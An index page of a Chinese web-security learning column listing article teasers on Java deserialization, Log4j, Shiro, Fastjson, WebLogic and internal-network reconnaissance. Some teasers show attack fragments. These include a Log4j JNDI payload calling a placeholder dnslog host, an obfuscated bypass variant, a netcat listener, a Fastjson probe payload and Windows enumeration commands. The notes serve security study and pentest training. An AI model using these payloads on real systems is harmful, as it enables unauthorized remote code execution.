首页
学习
活动
专区
工具
TVP
发布

Naraku的专栏

Web安全学习笔记
专栏作者
65
文章
81418
阅读量
14
订阅数
Spring Cloud Gateway内存马注入
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式 以下版本的Spring Cloud Gateway存在SPEL表达式注入漏洞CVE-2022-22947,可导致未授权远程命令执行漏洞
Naraku
2022-09-08
2.3K0
Java安全-反序列化-4-CC6
上一篇文章中通过AnnotationInvocationHandler#invoke方法来触发LazyMap#get方法,而AnnotationInvocationHandler这个类在高版本Java(8u71以后)进行了修改,导致该利用链无法利用。 这里讲另一个相对比较通用的Gadget:CommonCollections6,这个Gadget使用了另一个类org.apache.commons.collections.keyvalue.TiedMapEntry,该类在其hashCode方法中调用了getValue,而在getValue中调用了this.map.get,即可以调用LazyMap#get方法。
Naraku
2022-04-26
4670
Java安全-反序列化-5-CC3
正常情况下,Java会根据配置项sun.boot.class.path和java.class.path中列举到的基础路径(这些路径是经过处理后的java.net.URL类)来寻找.class文件来加载,而这个基础路径有三种情况:
Naraku
2022-04-26
3730
Java安全-反序列化-3-CC1
如果想劫持一个对象内部的方法调用,需要用到java.reflect.Proxy#newProxyInstance
Naraku
2022-04-17
3870
Java安全-反序列化-2-CC
TransformedMap,⽤于对Map类型的对象做修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。 如下,传入变量innerMap,返回outerMap。outerMap在添加新元素时,keyTransformer是处理新元素的Key的回调,valueTransformer是处理新元素的Value的回调,处理后得到的返回值才会被添加进outerMap中
Naraku
2022-04-14
2970
Java安全-反序列化-1-URLDNS
Java在序列化对象时,将会调用这个对象的writeObject方法,参数类型是ObjectOutputStream,开发者可以将任何内容写入这个Stream中;反序列化时,也会调用这个对象的readObject方法,可以读取到前面写入的内容并进行处理
Naraku
2022-04-14
1970
Java安全-RMI篇
发起一次RMI通信,Server端192.168.111.1,Client端192.168.111.2
Naraku
2022-04-01
7760
Java安全-反射篇
forName不是获取“类”的唯⼀途径,通常有三种⽅式获取⼀个“类”,也就是java.lang.Class对象:
Naraku
2022-03-29
5730
Xray PoC
脚本编写 建议先过一遍参考文档:https://docs.xray.cool/#/guide/poc/v2 YAML 一种可读的序列化数据,类似JSON。参考:YAML - Wiki 特点 大小写敏感 可以使用#号注释 使用缩进表示层级关系,缩进不允许使用Tab,可以用空格 关于YAML字符串转义:https://stackoverflow.com/questions/3790454/ 基本信息 文件命名格式为:组件-编号-漏洞类型.yml,如:node-cve-2017-14849-fileread.ym
Naraku
2022-03-03
1.8K0
Log4j-JNDI注入RCE
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022-02-24
1.6K0
Vulnstack3
添加完网卡后打开虚拟机会连接到VMnet2网卡(如果没有就手动连一下)。其中Web-Centos为出网机,需要重新获取IP,然后Ping测试一下各主机连通性
Naraku
2022-02-14
1.4K0
Kerberos基础入门
当Client想要访问Server上的某个服务时,需要先向AS证明自己的身份,然后通过AS发放的TGT向Server发起认证请求,这个过程分为三块:
Naraku
2022-02-03
1K0
语雀迁移至Obsidian
之前一直使用Typora+各种博客(Wordpress/Hexo/Typecho)来进行笔记和写作,后来接触并爱上了语雀,主要是贴图太方便了。(使用Typora的时候会搭配PicGo+云存储,但是有时候会粘贴了多余的图片或者想替换已有图片时,懒得打开云存储进行删除,久而久之就忘了,造成了一定的空间浪费。) 刚开始用语雀的时候还特地看了下,可以导出md格式的文章。但最近想批量导出知识库时,发现只能选择PDF或者语雀特定的格式,数据不在自己手里感觉不大放心。于是弄了个脚本通过语雀官方API导出了全部文章,并开始寻找本地存储的笔记软件。 结合个人情况进行筛选后发现Obisidian比较适合,但是一开始不会用,不会怎么处理图片路径的问题。语雀是没有目录这个概念的,所以导出的文章都放到了一起,然后图片等资源也统一放到了文章目录中的某一目录。而如果我在Obsidian里通过建立多级文件夹的方式来分类文章,那么所有图片资源的链接都要进行改动,差点弃坑了。还好在B站看了关于ob的视频,学到了通过索引的方式来进行管理。
Naraku
2022-01-20
4.3K0
Crawlergo_X_Xray
环境 Ubuntu20.04+Python3 Xray Crawlergo Crawlergo_X_Xray Httprobe 前期准备 # 安装依赖 $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get install unzip git tree $ sudo apt install python3 # Python3 $ sudo apt install python3-pip
Naraku
2021-07-29
5540
Weblogic-CVE-2021-2109
影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1
Naraku
2021-07-29
6580
实习记录(一) - 内网渗透之Neo-reGeorg
如果要使用BurpSuite抓包进行如暴力破解等操作,还需要另外配置一下BurpSuite的代理
Naraku
2021-07-29
1.7K0
实习记录(二) - Shiro反序列化漏洞
背景:最近公司的师傅丢了个内网渗透的靶场让我们玩,需要通过对外映射的Web服务打进去。一开始看到是一个JeeCMS的站点,直接弱口令就进了后台。但是瞎搞一通都拿不到Shell。搜索了一番才知道原来方向错了,其实是一个Shiro反序列化的漏洞。 漏洞概述 Shiro使用 CookieRememberMeManager这个类对Cookie中的 remeberMe进行 序列化 => 使用密钥进行AES加密 => Base64编码,最后返回客户端 remebreme Cookie。在识别用户身份时需要对 remem
Naraku
2021-07-29
1.6K0
实习记录(四) - Fastjson反序列化漏洞
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 JavaBean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 漏洞检测 DNSLog回显 通过构造DNS解析来判断是否是Fastjson,Fastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显,以此判断是不是Fastjson {"a":{"@type":"java.net.Inet4Address","val":"xxx.dnsl
Naraku
2021-07-29
2.2K0
实习记录(五) - AJP协议文件读取漏洞
Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。而Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
Naraku
2021-07-29
8210
内网信息收集
基本信息 # 网络信息 $ ipconfig /all # 查询网络配置信息 # 系统信息 $ systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" # 查询操作系统和软件信息 $ systeminfo # 查看补丁列表 $ wmic qfe get Caption,Description,HotFixID,InstallOn # 查看安装在系统的补丁 # 服务信息 $ wmic service list brief # 查询本机服务信息 $
Naraku
2021-07-29
7380
点击加载更多
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档